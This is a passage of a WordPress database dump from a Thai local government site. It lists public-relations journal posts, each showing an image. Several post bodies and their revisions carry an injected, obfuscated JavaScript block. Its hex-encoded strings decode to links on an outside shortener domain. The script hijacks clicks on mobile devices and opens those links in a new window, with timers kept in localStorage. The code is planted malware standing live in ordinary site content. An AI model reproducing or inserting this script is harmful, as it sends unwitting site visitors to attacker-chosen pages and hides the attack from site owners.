_0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','203-revision-v1','','','2024-07-27 22:41:25','2024-07-27 15:41:25','',203,'http://pakhaeng.ssk.in.th/?p=205',0,'revision','',0),
(206,1,'2024-07-27 22:41:56','2024-07-27 15:41:56','<!-- wp:image {\"id\":207,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/6-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-207\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-7','','','2024-07-28 23:09:40','2024-07-28 16:09:40','',0,'http://pakhaeng.ssk.in.th/?p=206',0,'post','',0),
(207,1,'2024-07-27 22:41:48','2024-07-27 15:41:48','','6-2566','','inherit','','closed','','6-2566-2','','','2024-07-27 22:41:48','2024-07-27 15:41:48','',206,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/6-2566-1.png',0,'attachment','image/png',0),
(208,1,'2024-07-27 22:41:56','2024-07-27 15:41:56','<!-- wp:image {\"id\":207,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/6-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-207\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','206-revision-v1','','','2024-07-27 22:41:56','2024-07-27 15:41:56','',206,'http://pakhaeng.ssk.in.th/?p=208',0,'revision','',0),
(209,1,'2024-07-27 22:42:39','2024-07-27 15:42:39','<!-- wp:image {\"id\":210,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/7-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-210\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else 